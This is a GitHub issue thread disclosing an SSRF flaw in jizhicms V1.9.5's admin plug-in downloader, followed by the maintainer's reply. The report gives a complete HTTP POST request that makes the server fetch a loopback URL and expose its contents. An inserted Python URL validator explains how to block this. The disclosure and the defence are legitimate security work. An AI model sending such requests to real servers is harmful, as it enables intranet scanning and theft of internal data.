V1.9.5: SSRF Vulnerability #67
Comments
Thank you for your letter!
Version 2.0 supports changing the plug-in address. If you want the system to download a file, you can forge an address and add your special file. You can download it directly without such complexity.
The plug-in module itself has permission control. If you do not have background permission, you will not be able to download plug-ins.
Thank you again for your suggestions, but I'm sorry: the plug-in function is not meant to download only specified files, but to download any files that the administrator wants to download. This is the original intention of my plug-in design. Keeping the administrator account safe is everyone's responsibility. If you lose the background account, you will lose everything.
------------------ Original message ------------------
From: "Cherry-toto/jizhicms" ***@***.***>;
Sent: Friday, 18 March 2022, 9:33 PM
Subject: [Cherry-toto/jizhicms] V1.9.5: SSRF Vulnerability (Issue #67)
An SSRF vulnerability with echo exists in the CMS background, and attackers can use this vulnerability to scan local and intranet ports and attack the local and intranet Jizhicms background. Attackers can use this vulnerability to scan local and intranet ports, attack local and intranet services, or carry out DoS attacks.
The vulnerability is located in the background plug-in download function.
I start a locally accessible web service with a flag.php file.
Use the payload:
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.48.135
Content-Length: 93
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.48.135
Referer: http://192.168.48.135//admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=821f3d50fa8cd84139c76be9
Connection: close

action=start-download&filepath=mutisite&download_url=http%3a%2f%2f127.0.0.1%3a8888%2fflag.php
See the response.
Browser access: http://192.168.48.135/cache/update_mutisite.zip
Open it with Notepad.
As with flag.php, this was read successfully.
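The maintainer's position above is that the downloader is meant to fetch whatever URL an administrator supplies, with the admin login as the only guard. A defender who additionally wants the URL itself checked before the fetch can add a validation step like the one below. This is an added illustration in Python, not code from jizhicms: the function names, the CONSTRUCTED_DNS table and the example hostnames are assumptions, and only the two addresses from the report (127.0.0.1:8888 and 192.168.48.135) come from the page. It rejects non-HTTP schemes, embedded credentials, literal or resolved loopback, RFC 1918, link-local and IPv4-mapped addresses, and optionally enforces an allow-list of plug-in hosts.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed DNS table for offline demonstration (hypothetical names and addresses).
CONSTRUCTED_DNS = {
    "plugins.example.com": ["93.184.216.34"],
    "localhost": ["127.0.0.1"],
    "rebind.example.net": ["93.184.216.34", "10.0.0.5"],  # one public, one private record
}


def fake_resolve(host):
    """Offline stand-in for DNS: look the name up in the constructed table."""
    return [ipaddress.ip_address(a) for a in CONSTRUCTED_DNS.get(host.lower(), [])]


def dns_resolve(host):
    """Real resolver: every address the name maps to (A and AAAA records)."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return [ipaddress.ip_address(info[4][0]) for info in infos]


def is_public_address(addr):
    """True only for a globally routable unicast address."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 must be judged as 127.0.0.1
    if (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified):
        return False
    return addr.is_global


def validate_download_url(url, resolve=dns_resolve, allowed_hosts=None):
    """Return (ok, reason) for a plug-in download URL supplied by an administrator.

    `resolve` is injectable so the check can be exercised without network access;
    `allowed_hosts`, when given, restricts downloads to known plug-in servers.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {scheme!r}"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL are not allowed"
    host = parts.hostname  # brackets already stripped for IPv6 literals
    if not host:
        return False, "missing host"
    if allowed_hosts is not None and host.lower() not in {h.lower() for h in allowed_hosts}:
        return False, f"host not on the allow-list: {host}"
    try:
        addrs = [ipaddress.ip_address(host)]  # literal IP: no DNS lookup needed
    except ValueError:
        addrs = resolve(host)
    if not addrs:
        return False, f"could not resolve host: {host}"
    for addr in addrs:  # every record must be public, not just the first one
        if not is_public_address(addr):
            return False, f"{host} maps to non-public address {addr}"
    return True, "ok"


def demo(resolve=fake_resolve):
    """Run the validator over the report's target and a few constructed URLs."""
    samples = [
        "http://127.0.0.1:8888/flag.php",           # the report's payload target
        "http://192.168.48.135/admin.php",          # the CMS host itself (RFC 1918)
        "http://[::ffff:127.0.0.1]:8888/flag.php",  # IPv4-mapped loopback
        "http://localhost:8888/flag.php",           # name resolving to loopback
        "http://rebind.example.net/plugin.zip",     # mixed public/private records
        "ftp://93.184.216.34/plugin.zip",           # scheme outside the allow-list
        "https://plugins.example.com/mutisite.zip", # legitimate plug-in source
    ]
    return {u: validate_download_url(u, resolve=resolve)[0] for u in samples}


if __name__ == "__main__":
    for url, ok in demo().items():
        print("ALLOW " if ok else "REJECT", url)
```

Two points for anyone wiring this into a real downloader: the fetch must connect to the address that was validated (pin the resolved IP, or re-run the check inside the HTTP client's connection hook), otherwise a name that resolves differently on the second lookup bypasses the check; and each redirect hop needs the same validation, since the first URL can be clean and the 302 target can point at 127.0.0.1. Neither of these replaces the admin permission check the maintainer describes; they limit what a stolen or misused admin session can reach.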
Ok, understood.